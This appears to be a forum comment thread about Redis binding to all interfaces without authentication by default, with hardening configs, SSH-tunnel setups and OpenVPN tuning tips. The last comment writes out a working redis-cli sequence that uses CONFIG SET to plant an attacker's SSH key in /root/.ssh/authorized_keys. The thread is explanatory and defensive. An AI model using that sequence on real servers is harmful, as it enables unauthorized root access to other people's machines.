As is, Redis should probably default to only using the UNIX socket (where filesystem permissions apply), with TCP-enabling configuration options having impossible-to-miss warnings in example configs and documentation.
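A socket-only default could be expressed with existing redis.conf directives; the directive names below are real, while the socket path and permission bits are just illustrative choices:

```
# Disable the TCP listener entirely
port 0
# Listen only on a UNIX socket, protected by filesystem permissions
unixsocket /var/run/redis/redis.sock
unixsocketperm 700
```

Anyone who genuinely needs TCP clients would then have to consciously re-enable `port` and set `bind`.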
In the blog post there's this part, castigating inattentive users for falling prey to this fail-open nature of Redis:
"The problem is that, whatever we state in our security page, there are a lot of Redis instances exposed to the internet unintentionally. Not because the use case requires outside clients to access Redis, but because nobody bothered to protect a given Redis instance from outside accesses via fire walling"
Sounds like the author should really have another hard think about this stance.
"By default Redis listens for connections from all the network interfaces available on the server."
In my case the reason Redis ended up exposed to the Internet was that another dev "updated the configuration" to the default provided by the package. Okay, perhaps that was the wrong thing to do, but it simply shouldn't be that easy to expose a vulnerable service to the Internet! I understand that people should run firewalls too, but a belt-and-braces approach should really be taken here.
PS. While I'm moaning, Jenkins is another big offender in this respect. I can't be the only person to have tried to side-step its own security by having it bind only to localhost and using SSH tunnelling, only to find that something which can execute arbitrary code is exposed to the public Internet when the configuration is switched back to its default. Yes, a firewall would fix it, but as far as I'm concerned, Jenkins shares some of the blame for being insecure by default in the absence of one.
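For reference, the loopback-only Jenkins setup described above is usually done via the Winstone listener argument; the file path shown is the Debian/Ubuntu packaging default and may differ on other distributions:

```
# /etc/default/jenkins (Debian/Ubuntu packaging)
JENKINS_ARGS="--httpListenAddress=127.0.0.1 --httpPort=8080"
```

You then reach it remotely with something like `ssh -L 8080:localhost:8080 user@host` and browse to http://localhost:8080. The catch, as described above, is that nothing stops a later config reset from silently reverting `httpListenAddress` to 0.0.0.0.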
Back in the day, daemons (especially IRCds) would have a 'comment me to enable' line arbitrarily inserted into the generated conf file which would prevent the daemon from starting up entirely. You'd spend 10 minutes reading through the config files rather than just presuming it was configured the way you wanted. The belt-and-braces approach should be that. Stupid users wouldn't be able to just 'gem install <foo>' or 'apt-get install <bar>' and then complain, so often that an engineer who has contributed so much to the community has to take time out of his day to justify "hey guys, you're sort of responsible for the way you configure your daemons". Remember, antirez did this for ages as a father, operating the entire project by himself (support and all) for multiple years before he was finally able to work on it full time.
Can you please go beyond vague references like "tons of things behind the scenes" and "certainly been evaluated"? What's the direct answer to the question: "Why can't it just listen on loopback by default?"
I'm not sure "stupid users" and "clever Antirez" gets us any further towards a proper answer here.
Whoever decides to use it should do their homework and _understand_ what they are installing.
This does not mean Redis can't harden the defaults and the documentation, but it is also not Redis's fault that people are too lazy to really understand what a software stack is doing.
autossh -M 0 -N -L 6379:localhost:6379 -o "ServerAliveInterval 60" \
-o "ServerAliveCountMax 3" -o "StrictHostKeyChecking=no" -o "BatchMode=yes" \
-i /home/tunnel/.ssh/id_rsa firstname.lastname@example.org
Edit: Should add autossh automatically reconnects the tunnel if the connection fails. Vanilla ssh does not.
(One of the other things you should strongly consider, if you care about HIPAA compliance, is using either full-disk encryption or encrypting the directory where Redis' data file resides. We do this with encryptfs. We also encryptfs the Tarsnap cache directory, which holds recoverable cleartext. Tarsnap archives are encrypted automatically without requiring further work.)
There are also another dozen or so box-ticking requirements with regard to procedures and documentation, but those are the main rubber-hits-the-hard-disk things you have to do with respect to using Redis for PHI.
It's been ages since I played around with networking at a low level (we're talking teenage years, when ARIN didn't charge for netblocks, and a Cisco 7206VXR could hold the entire Internet BGP table), but I'll give it a go.
1) It's not a fair comparison to begin with, since OpenVPN is maintaining a lot more state. As configured in his tests it's acting as a Layer 3 router, so there's bound to be more overhead than in a single point-to-point SSH connection; he should be using bridged mode and switching via a virtual switch at L2 instead. He sort of acknowledged this by making an appeal to the OSI layers, but then didn't check to see if there was a way to disable the full-routing functionality and move down to switching.
As he himself said, he's using this simply to tunnel peer-to-peer, so if he configured his subnet as a /30 on OpenVPN, defined static routes, and read this guide, he'd see that an MTU of ~6000 is recommended (jumbo frames indeed!). Starting with a config similar to his (using iperf), the OpenVPN guys went from ~125 Mbps to ~500 Mbps.
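The relevant knobs from that tuning exercise look roughly like the fragment below; these are real OpenVPN directives, but the values are the ones reported in that guide, not universal recommendations, and both endpoints must agree on them:

```
# Point-to-point tunnel tuning (set identically on both peers)
tun-mtu 6000      # large tunnel MTU ("jumbo frames" inside the tunnel)
fragment 0        # disable OpenVPN's internal fragmentation
mssfix 0          # don't clamp TCP MSS inside the tunnel
```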
That was without kernel tuning, just parameter changing.
2) I haven't tested this, but if you read the comments within the thread (especially those made by kasperd), his networking device is misconfigured at the kernel level (for his purposes), leading to tons of fragmentation that can be rectified [see the MTU/MSS discussion in the OP's "Read more comments"]. Edit: Yep, I was right. Check cite .
I'm sure someone who's actually in networking can address this further but this is not only apples-to-oranges but rotten-apples*-to-oranges. (where rotten-apples == a very poorly configured set of OpenVPN instances).
Also, FWIW, I use a systemd service for an SSH tunnel instead of autossh. Works brilliantly.
Description=SSH remote forwarding to here
ExecStart=/bin/ssh -v -N -o PasswordAuthentication=no -o "ServerAliveInterval 60" -o "ServerAliveCountMax 3" -R 2222:localhost:22 -o TCPKeepAlive=yes -p 222 -i /home/autossh/.ssh/autossh email@example.com
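A fuller version of that unit might look like the sketch below; the ExecStart line is the one above, while the `[Unit]`/`[Install]` sections and the `Restart=` settings (which give you the auto-reconnect behaviour autossh provides) are my assumptions:

```
[Unit]
Description=SSH remote forwarding to here
After=network-online.target
Wants=network-online.target

[Service]
User=autossh
ExecStart=/bin/ssh -N -o PasswordAuthentication=no -o "ServerAliveInterval 60" -o "ServerAliveCountMax 3" -o TCPKeepAlive=yes -R 2222:localhost:22 -p 222 -i /home/autossh/.ssh/autossh email@example.com
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target
```

The ServerAlive options make ssh exit when the connection dies, and `Restart=always` brings it straight back up, which is exactly the job autossh does.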
Generally speaking I think way too many services assume that they're allowed to roam the filesystem freely, when chrooting should be "the bare minimum" one could expect.
Like having port 6379 be open to anyone who happens to wander by? Your firewall was horribly configured and you got burned; take this as a learning opportunity to fix your mistakes.
> ... that they don't even MENTION the security
> concerns from the quickstart guide
Like the 'Securing Redis' section from that link?
> By default Redis binds to all the interfaces and has no authentication at all. ...
> 1) Make sure the port Redis uses to listen for connections is firewalled...
> 2) Use a configuration file where the bind directive is set ... [to] as little network interfaces you are using...
> 3) Use the requirepass option ...
> 4) Use spiped or another SSL tunnelling software...
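Items 2 and 3 of that list in redis.conf form (the directive names are real; the password is a placeholder, and since AUTH is cheap to brute-force it should be a long random string):

```
# Only accept connections on loopback
bind 127.0.0.1
# Require clients to AUTH before issuing commands
requirepass <long-random-password>
```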
# Command renaming.
# It is possible to change the name of dangerous commands in a shared
# environment. For instance the CONFIG command may be renamed into something
# hard to guess so that it will still be available for internal-use tools
# but not available for general clients.
# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52
# It is also possible to completely kill a command by renaming it into
# an empty string:
# rename-command CONFIG ""
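One way to generate a hard-to-guess replacement name, mirroring the SHA-1-looking example above; this is just `openssl` producing 160 random bits as hex:

```shell
# 20 random bytes -> 40 hex characters, suitable as an unguessable command name
TOKEN=$(openssl rand -hex 20)
echo "rename-command CONFIG \"$TOKEN\""
```

Paste the emitted line into redis.conf; internal tooling that still needs CONFIG then uses the token as the command name.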
I'm a big Redis fan and have used most of its power, including the great HyperLogLog stuff, but I never really looked at the CONFIG command and wouldn't have imagined it would even allow such things.
Is CONFIG commonly used? What are the use cases?
> This is perfectly fine if you are starting Redis just to play a bit with it or for development, but for production environments you should use a configuration file.
Not to mention you can overwrite arbitrary files by setting the dbfilename and the working directory via CONFIG SET (not sure why these are runtime-settable options to start with?).
They didn't even bother changing the key name.
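For anyone wondering how that works: the widely reported attack against open instances is roughly the following redis-cli session (shown against a hypothetical unprotected host; obviously don't run this against machines you don't own):

```
$ redis-cli -h victim
victim:6379> CONFIG SET dir /root/.ssh
victim:6379> CONFIG SET dbfilename authorized_keys
victim:6379> SET crackit "\n\nssh-rsa AAAA...attacker-key...\n\n"
victim:6379> SAVE
```

The saved RDB file contains binary framing around the key, but sshd skips unparseable lines in authorized_keys, so the embedded public key still grants the attacker a login. "crackit" is the key name seen in the attacks in the wild, which is what the parent means by not even bothering to change it.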